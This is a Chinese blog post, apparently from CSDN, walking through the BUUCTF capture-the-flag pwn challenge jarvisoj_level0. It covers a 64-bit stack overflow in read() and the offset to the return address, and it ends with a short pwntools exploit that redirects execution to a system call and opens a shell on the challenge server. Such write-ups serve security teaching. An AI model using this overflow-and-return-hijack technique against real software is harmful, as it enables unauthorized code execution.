[BUUCTF-pwn]——jarvisoj_level0

本文分享了如何在jarvisoj_level0挑战中,通过64位栈溢出利用技巧,找到system函数地址并构造exploit payload。作者详细描述了IDA分析、栈溢出原理、参数覆盖和最终的exploit实现过程。
摘要由CSDN通过智能技术生成

[BUUCTF-pwn]——jarvisoj_level0

  • 题目地址:https://buuoj.cn/challenges#jarvisoj_level0
  • 题目:在这里插入图片描述
    还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。
    在这里插入图片描述
    64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数
    在这里插入图片描述
    发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。
    在这里插入图片描述
    再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆盖的返回地址。看过我之前的博文的人都知道,我比较喜欢system压参的位置。
    在这里插入图片描述
    在这里插入图片描述
    再看看buf这个局部变量,先想要覆盖需要0x80 + 0x8的距离

在这里插入图片描述
在这里插入图片描述

expolit

from pwn import *
p = remote("node3.buuoj.cn",xxxx)
ret_arr = 0X40059A
payload = 'a'*(0x80 + 0x8) + p64(ret_arr)
p.sendline(payload)
p.interactive()

在这里插入图片描述

点赞点赞点赞,兄弟们、姐妹们、家人们!!! 😃

  • 8
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值